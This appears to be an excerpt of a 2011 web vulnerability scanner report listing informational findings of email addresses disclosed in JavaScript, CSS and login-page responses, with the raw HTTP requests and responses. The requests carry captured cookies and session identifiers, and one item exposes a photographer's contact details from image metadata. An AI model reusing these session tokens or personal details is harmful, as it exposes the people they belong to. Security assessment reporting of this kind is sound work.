.....>Exif..II*.......................Copyright Lars Topelmann........Ducky.......<......http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns
...[SNIP]...
eny St" Iptc4xmpCore:CiAdrCity="Portland" Iptc4xmpCore:CiAdrRegion="Oregon" Iptc4xmpCore:CiAdrPcode="97214" Iptc4xmpCore:CiAdrCtry="USA" Iptc4xmpCore:CiTelWork="503 234 1963" Iptc4xmpCore:CiEmailWork="lars@larstopelmann.com" Iptc4xmpCore:CiUrlWork="http://larstopelmann.com"/>
...[SNIP]...

23.3. http://b3.mookie1.com/RealMedia/ads/Creatives/USNetwork/TRACK_MIG/mig_analytics.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/RealMedia/ads/Creatives/USNetwork/TRACK_MIG/mig_analytics.js

Issue detail

The following email address was disclosed in the response:

id@Vs.tc

Request

GET /RealMedia/ads/Creatives/USNetwork/TRACK_MIG/mig_analytics.js HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Mon, 24 May 2010 23:22:14 GMT
ETag: "7ba13a2-529a-4875f4f9a5580"
Accept-Ranges: bytes
Content-Length: 21146
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/;httponly

//begin OAS Analytics
var d=document;
var OAS_rdl = '';
var OAS_CA = 'N';
if((d.referrer)&&(d.referrer!="[unknown origin]"))
{
   if(d.referrer.indexOf("?") == -1)
   {
       OAS_rdl += '&tax
...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...

23.4. http://cache.boston.com/universal/js/bcom_hp_scripts.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cache.boston.com
Path:	/universal/js/bcom_hp_scripts.js

Issue detail

The following email address was disclosed in the response:

brian@cherne.net

Request

GET /universal/js/bcom_hp_scripts.js HTTP/1.1
Host: cache.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7; RMFD=011QK73VO205zQN|O105zfl

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:23:40 GMT
Server: Apache/2.2.10 (Unix) modpath/0.4 PHP/5.2.6
Content-Type: application/javascript
Warning: 110 cache.boston.com "Response is stale" "Fri, 08 Jul 2011 07:21:20 GMT"
Last-Modified: Thu, 23 Dec 2010 14:30:43 GMT
Accept-Ranges: bytes
Served-By: connor
Age: 1088
ETag: "488e32-440c-49814b6f49f11"
Cache-Control: max-age=3600
Via: HTTP/1.1 cache.boston.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet.
Expires: Tue, 19 Jul 2011 21:23:39 GMT
Via: 1.1 rhv082184010000 (MII-APC/2.0)
x-mii-cache-hit: 1
Content-Length: 17420

/**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @param
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

23.5. http://cache.boston.com/universal/js/twitterwidget.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cache.boston.com
Path:	/universal/js/twitterwidget.js

Issue detail

The following email address was disclosed in the response:

dustin@twitter.com

Request

Response

23.6. http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn-0.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

Issue detail

The following email address was disclosed in the response:

you@example.com

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-0.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: x4M751vsyia6yn1nzPnEVNrA+AuEhwB/x/3QhkcN1YKXrgw+ug8pKiZAAv+/c1wK
x-amz-request-id: 5AF895301A577AFC
Date: Tue, 12 Jul 2011 17:56:27 GMT
Cache-Control: max-age=31536000
Expires: Wed, 11 Jul 2012 06:57:04 GMT
Last-Modified: Tue, 12 Jul 2011 07:01:24 GMT
ETag: "9c0ff6f4c105c41bbed5abe133356fb0"
Accept-Ranges: bytes
Content-Type: text/javascript
Content-Length: 304460
Server: AmazonS3
Age: 607182
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: e428617553c7e348a8118ca0028b8a92716c6fc8d157255d9df41267c319e1b5270e7c2578badd16
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 cab1fe2d187949d5097aa78dac8f5928.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

(function(a,b){function ci(a){return d.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cf(a){if(!b_[a]){var b=d("<"+a+">").appendTo("body"),c=b.css("display");b.remove();if(c===
...[SNIP]...
ainerDomId;this.bindListeners();}
EmailSubscription.prototype={bindListeners:function(){var self=this;$('form#'+self.formDomId).submit(function(event){var email=$('#'+self.emailDomId).val();if(email=='you@example.com'||!self.validateEmail(email)){$('#'+self.emailErrorDomId).show();}else{var postData={email:email,ch:fsTop.channel.name,ml_aid:self.mailingListAssetId};if(self.entityType){postData.et=self.entityType;}
...[SNIP]...

23.7. http://cdn-0.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn-0.fansnap.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

Issue detail

The following email address was disclosed in the response:

you@example.com

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: cdn-0.fansnap.com

Response

HTTP/1.0 200 OK
x-amz-id-2: knN/dFBbGwn8rOtStOXf19nyA7reSbnijcldW4BwgpSixdeE6jIYJW6EnE18cZ+7
x-amz-request-id: 3CC91272AC0AEF46
Date: Tue, 12 Jul 2011 17:56:36 GMT
Cache-Control: max-age=31536000
Expires: Wed, 11 Jul 2012 06:57:04 GMT
Last-Modified: Tue, 12 Jul 2011 07:01:24 GMT
ETag: "9c0ff6f4c105c41bbed5abe133356fb0"
Accept-Ranges: bytes
Content-Type: text/javascript
Content-Length: 304460
Server: AmazonS3
Age: 607350
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 60c48ca07357995587bd0a8d9fa5ec2d19ac1f4a2664876b1766455297d89640a3cb3bd852a2e9f0
Via: 1.0 8a8618213617600186ecf6bd4987d76d.cloudfront.net:11180 (CloudFront), 1.0 17f2340bce21dc578315ae9d02405a64.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

(function(a,b){function ci(a){return d.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cf(a){if(!b_[a]){var b=d("<"+a+">").appendTo("body"),c=b.css("display");b.remove();if(c===
...[SNIP]...
ainerDomId;this.bindListeners();}
EmailSubscription.prototype={bindListeners:function(){var self=this;$('form#'+self.formDomId).submit(function(event){var email=$('#'+self.emailDomId).val();if(email=='you@example.com'||!self.validateEmail(email)){$('#'+self.emailErrorDomId).show();}else{var postData={email:email,ch:fsTop.channel.name,ml_aid:self.mailingListAssetId};if(self.entityType){postData.et=self.entityType;}
...[SNIP]...

23.8. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn-1.f6img.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

Issue detail

The following email address was disclosed in the response:

you@example.com

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: x4M751vsyia6yn1nzPnEVNrA+AuEhwB/x/3QhkcN1YKXrgw+ug8pKiZAAv+/c1wK
x-amz-request-id: 5AF895301A577AFC
Date: Tue, 12 Jul 2011 17:56:27 GMT
Cache-Control: max-age=31536000
Expires: Wed, 11 Jul 2012 06:57:04 GMT
Last-Modified: Tue, 12 Jul 2011 07:01:24 GMT
ETag: "9c0ff6f4c105c41bbed5abe133356fb0"
Accept-Ranges: bytes
Content-Type: text/javascript
Content-Length: 304460
Server: AmazonS3
Age: 607036
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 92d669bfe0c1d28124cf2423ed4cb88b016eeed20e0321d2e6e24e78183c3749ba87dbb1c55cd7c8
Via: 1.0 4552622032e7495f9882a209f0041039.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

(function(a,b){function ci(a){return d.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cf(a){if(!b_[a]){var b=d("<"+a+">").appendTo("body"),c=b.css("display");b.remove();if(c===
...[SNIP]...
ainerDomId;this.bindListeners();}
EmailSubscription.prototype={bindListeners:function(){var self=this;$('form#'+self.formDomId).submit(function(event){var email=$('#'+self.emailDomId).val();if(email=='you@example.com'||!self.validateEmail(email)){$('#'+self.emailErrorDomId).show();}else{var postData={email:email,ch:fsTop.channel.name,ml_aid:self.mailingListAssetId};if(self.entityType){postData.et=self.entityType;}
...[SNIP]...

23.9. http://cdn-1.fansnap.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn-1.fansnap.com
Path:	/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

Issue detail

The following email address was disclosed in the response:

you@example.com

Request

Response

HTTP/1.0 200 OK
x-amz-id-2: 1lpYEuSfxof8FCN+lIIz603PkMKuJ9Fi/RGv6bpp3RADGgQATaMZNAEZchnTMSkK
x-amz-request-id: 3D01A8857C0A03FD
Date: Tue, 12 Jul 2011 17:58:56 GMT
Cache-Control: max-age=31536000
Expires: Wed, 11 Jul 2012 06:57:04 GMT
Last-Modified: Tue, 12 Jul 2011 07:01:24 GMT
ETag: "9c0ff6f4c105c41bbed5abe133356fb0"
Accept-Ranges: bytes
Content-Type: text/javascript
Content-Length: 304460
Server: AmazonS3
Age: 607082
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: b3151678367e6c57a9a4193ab800cf4ee07a278868320d50d0600b96baffe78306fe254c5a73ecdf
Via: 1.0 9ddc02009e4fa67e3c52fc9fe8639037.cloudfront.net:11180 (CloudFront), 1.0 a02a758285c6952d9ec10f895b84b63a.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

(function(a,b){function ci(a){return d.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cf(a){if(!b_[a]){var b=d("<"+a+">").appendTo("body"),c=b.css("display");b.remove();if(c===
...[SNIP]...
ainerDomId;this.bindListeners();}
EmailSubscription.prototype={bindListeners:function(){var self=this;$('form#'+self.formDomId).submit(function(event){var email=$('#'+self.emailDomId).val();if(email=='you@example.com'||!self.validateEmail(email)){$('#'+self.emailErrorDomId).show();}else{var postData={email:email,ch:fsTop.channel.name,ml_aid:self.mailingListAssetId};if(self.entityType){postData.et=self.entityType;}
...[SNIP]...

23.10. http://feedburner.google.com/fb/feed-styles/bf30.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feedburner.google.com
Path:	/fb/feed-styles/bf30.js

Issue detail

The following email address was disclosed in the response:

sburke@cpan.org

Request

GET /fb/feed-styles/bf30.js HTTP/1.1
Host: feedburner.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://feeds.feedburner.com/netsparker
Cookie: PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/javascript
Last-Modified: Thu, 25 Mar 2010 09:42:43 GMT
Date: Tue, 19 Jul 2011 15:41:16 GMT
Expires: Tue, 19 Jul 2011 15:41:16 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 12057
X-XSS-Protection: 1; mode=block

//GLOBALS
var userchoice
var anychoice
var savechoice
var jsFeedUrl = "...";
var jsFeedTitle = null;

// A workaround for XSL-to-XHTML systems that don't
// implement XSL 'disable-output-escaping="yes"'.
//
// sburke@cpan.org, Sean M. Burke.
// - I hereby release this JavaScript code into the public domain.

var is_decoding;
var DEBUG = 0;

function complaining (s) { alert(s); return s; }

if(!(document.getElementById))
...[SNIP]...

23.11. http://i2.onlinehelp.microsoft.com/Areas/Global/Content/Omniture/resources/OnlineHelp/omni_rsid_OnlineHelp.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i2.onlinehelp.microsoft.com
Path:	/Areas/Global/Content/Omniture/resources/OnlineHelp/omni_rsid_OnlineHelp.js

Issue detail

The following email address was disclosed in the response:

id@Vs.tc

Request

GET /Areas/Global/Content/Omniture/resources/OnlineHelp/omni_rsid_OnlineHelp.js HTTP/1.1
Host: i2.onlinehelp.microsoft.com
Proxy-Connection: keep-alive
Referer: http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=86400
Content-Type: application/javascript
Last-Modified: Mon, 06 Jun 2011 11:08:01 GMT
Accept-Ranges: bytes
ETag: "80a41103a24cc1:0"
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
ntCoent-Length: 70055
Content-Length: 70055
X-Serial: 1363
Vary: Accept-Encoding
X-Check-Cacheable: YES
Date: Tue, 19 Jul 2011 15:16:06 GMT
Connection: close

var _om_gbls={omniGuidPath:"",version:"1105",tmp:"",s_account:"",market:"",app:"",center:"",library:"",subdom:"",catpath:"",site:"",wtspparam:"",host:"",path:"",href:"",extraRsids:"",extraRsidsArr:"",
...[SNIP]...
#7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=^
...[SNIP]...

23.12. https://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/login.srf

Issue detail

The following email address was disclosed in the response:

someone@example.com

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14574
Content-Type: text/html; charset=utf-8
Expires: Tue, 19 Jul 2011 15:37:02 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1311089882&co=1&id=273572; path=/;version=1
Set-Cookie: MSPOK=$uuid-240ff659-d409-4377-897e-e75ad2d199e3$uuid-1895cee1-27dd-48d7-8aac-abac4dc44583$uuid-893a9771-4ec1-49d2-b1d0-11979f88bfa5; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1H49 V: 0
Date: Tue, 19 Jul 2011 15:38:01 GMT
Connection: close



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...
~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!IN~India~91~^[1-9]{1}[0-9]{9}$~81234-56789~-=5!!!IT~Italy~39~^[1-9]{1}[0-9]{8,9}$~123 456 7890~=3, =6!!!JP~Japan~81~^[A-Za-z0-9_.-]+@([A-Za-z0-9_-]+\.)+[A-Za-z0-9]+$~someone@example.com~!!!JO~Jordan~962~^[1-9]{1}[0-9]{8}$~7 7123 4567~=1, =5!!!KR~Korea~82~^[1-9]{1}[0-9]{8,9}$~10 1234 5678~=2, =6!!!KW~Kuwait~965~^[1-9]{1}[0-9]{7}$~6123 4567~=4!!!MY~Malaysia~60~^[1-9]{1}[0-9]{8}$~1-4234
...[SNIP]...

23.13. http://majornelson.com/wp-content/themes/roundhouse/style.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://majornelson.com
Path:	/wp-content/themes/roundhouse/style.css

Issue detail

The following email address was disclosed in the response:

jackson@roundhouseagency.com

Request

GET /wp-content/themes/roundhouse/style.css HTTP/1.1
Host: majornelson.com
Proxy-Connection: keep-alive
Referer: http://majornelson.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Jul 2011 23:43:05 GMT
Content-Type: text/css
Content-Length: 8492
Last-Modified: Tue, 24 May 2011 16:21:32 GMT
Connection: keep-alive
Expires: Thu, 18 Aug 2011 23:43:05 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

/*
Theme Name: RH MN 2011
Theme URI: http://majornelson.com
Description: Roundhouse Theme for Major Nelson
Version: 1.1
Author: Jackson Oates, jackson@roundhouseagency.com
Author URI: http://roundhouseagency.com
*/
@charset "utf-8";

/* Basic tag styles */
body {
   background-color: #252525;
   margin:0;
   font-family: Arial, Helvetica, sans-serif;
   font-size:12px;
}
#wrapp
...[SNIP]...

23.14. http://media.gamehouse.com/4/js/s_code_test.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.gamehouse.com
Path:	/4/js/s_code_test.js

Issue detail

The following email address was disclosed in the response:

id@Us.tc

Request

GET /4/js/s_code_test.js HTTP/1.1
Host: media.gamehouse.com
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "7b5e-4a821189a5fc0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/x-javascript
Age: 24023
Date: Tue, 19 Jul 2011 20:25:44 GMT
Last-Modified: Fri, 15 Jul 2011 20:00:07 GMT
Content-Length: 31582
Connection: keep-alive

/* SiteCatalyst code version: H.15.1.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
`i+s.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`h;`Wm('t')`5s.p"
+"_r)s.p_r()}^7(qs);^y`o(@g;`k@g`L^9,`F$51',vb`R@G=^D=s.`N`g=s.`N^K=`E^z^x=s.ppu=^n=^nv1=^nv2=^nv3`h`5$t)`E^z@G=`E^zeo=`E^z`N`g=`E^z`N^K`h`5!id@Us.tc){s.tc=1;s.flush`Z()}`2$h`Atl`0o,t,n,vo`1;s.@G=@uo"
+"`R`N^K=t;s.`N`g=n;s.t(@g}`5pg){`E^zco`0o){`K@J\"_\",1,#8`2@uo)`Awd^zgs`0$P{`K@J$k1,#8`2s.t()`Awd^zdc`0$P{`K@J$k#8`2s.t()}}@2=(`E`I`X`8`4@ss@b0`Rd=
...[SNIP]...

23.15. http://media.ticketmaster.com/en-us/js/1cf39641cc0465a6e003b267636b5ebb/prototype/controls.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.ticketmaster.com
Path:	/en-us/js/1cf39641cc0465a6e003b267636b5ebb/prototype/controls.js

Issue detail

The following email address was disclosed in the response:

tdd@tddsworld.com

Request

GET /en-us/js/1cf39641cc0465a6e003b267636b5ebb/prototype/controls.js HTTP/1.1
Host: media.ticketmaster.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEORAN=1; SID=Y3dq6VJOUobgvd5jFa2adifFsjQPEDu1SwQqHaI3I3ywZ2h_RqrBBbchAambLEYToFNp0jdvZxmi9vEG; BID=MN5k2Ii01e9c8eT9zIsTZrTP8tnmzVQDkHCqfm3pQgSOOVA96YtvgyxM-HQGO_XI68l_ZoGoHFIlKwiEeN9v; NDMA=238; NPDMA=238; GEO_OMN=in

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 06 Jun 2011 17:11:48 GMT
ETag: "87e3-32d83d00"
Accept-Ranges: bytes
Content-Length: 34787
Content-Type: application/x-javascript
Cache-Control: public, max-age=233
Date: Tue, 19 Jul 2011 18:35:46 GMT
Connection: close

// script.aculo.us controls.js v1.9.0, Thu Dec 23 16:54:48 -0500 2010

// Copyright (c) 2005-2010 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2010 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

23.16. http://realnetworks.com/WorkArea/java/ektron.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://realnetworks.com
Path:	/WorkArea/java/ektron.js

Issue detail

The following email address was disclosed in the response:

jquery-en@googlegroups.com

Request

GET /WorkArea/java/ektron.js HTTP/1.1
Host: realnetworks.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://realnetworks.com/
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=realnetworks.com&SiteLanguage=1033; EktGUID=5deba55d-ce92-4fa1-a77a-4e1715f3a271; EkAnalytics=5deba55d-ce92-4fa1-a77a-4e1715f3a271; ASP.NET_SessionId=jujqxa5505mhmhqykjipqtbx

Response

